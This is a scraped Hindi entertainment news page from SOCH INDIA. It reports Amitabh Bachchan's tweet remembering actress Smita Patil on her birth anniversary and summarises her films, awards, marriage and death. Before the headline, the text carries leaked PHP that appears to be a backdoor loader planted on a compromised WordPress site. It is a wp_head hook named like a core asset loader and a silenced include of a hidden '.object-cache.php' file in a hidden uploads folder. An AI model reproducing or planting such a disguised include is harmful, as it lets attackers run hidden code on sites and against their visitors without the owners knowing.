add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); स्मिता पाटिल शानदार महिला थीं: बिग बी – SOCH INDIA
Menu

मनोरंजन
स्मिता पाटिल शानदार महिला थीं: बिग बी

nobanner

बॉलीवुड महानायक अमिताभ बच्चन ने अभिनेत्री स्मिता पाटिल को शानदार महिला करार दिया. दोनों पर गीत ‘कि पग घुंघरू बांध मीरा नाची थी और हम नाचे बिन घुंघरू के’ फिल्माया गया था. अमिताभ (74) ने ‘शक्ति’, ‘नमक हलाल’ जैसी फिल्मों में स्मिता के साथ काम कर चुके हैं. उन्होंने दिवंगत अभिनेत्री को उनके 61वें जन्मदिन पर याद किया.

अमिताभ ने ट्विटर पर लिखा, “स्मिता पाटिल का जन्मदिन. उनके साथ ‘शक्ति’ और ‘नमक हलाल’ में काम किया था. शानदार महिला थीं. उन्हें मैं दोस्त मानता था.”

स्मिता को शानदार अभिनेत्रियों में से एक माना गया है. उन्होंने अपने करियर में हिंदी और मराठी की 80 फिल्मों में काम किया है. वह दो राष्ट्रीय फिल्म पुरस्कार और 1985 में पद्मश्री से भी सम्मानित हो चुकी हैं.

वह ‘मंथन’, ‘भूमिका’, ‘आक्रोश’, ‘चक्र’ और ‘मिर्च मसाला’ जैसी फिल्मों में काम कर चुकी हैं.

उन्होंने अभिनेता राज बब्बर के साथ विवाह किया था. बेटे के जन्म के दो हफ्ते बाद ही बीमार स्मिता का दिसंबर 1986 में निधन हो गया था. उनका बेटा प्रतीक भी अभिनेता हैं. राज बब्बर इस समय कांग्रेस की उत्तर प्रदेश इकाई के अध्यक्ष हैं.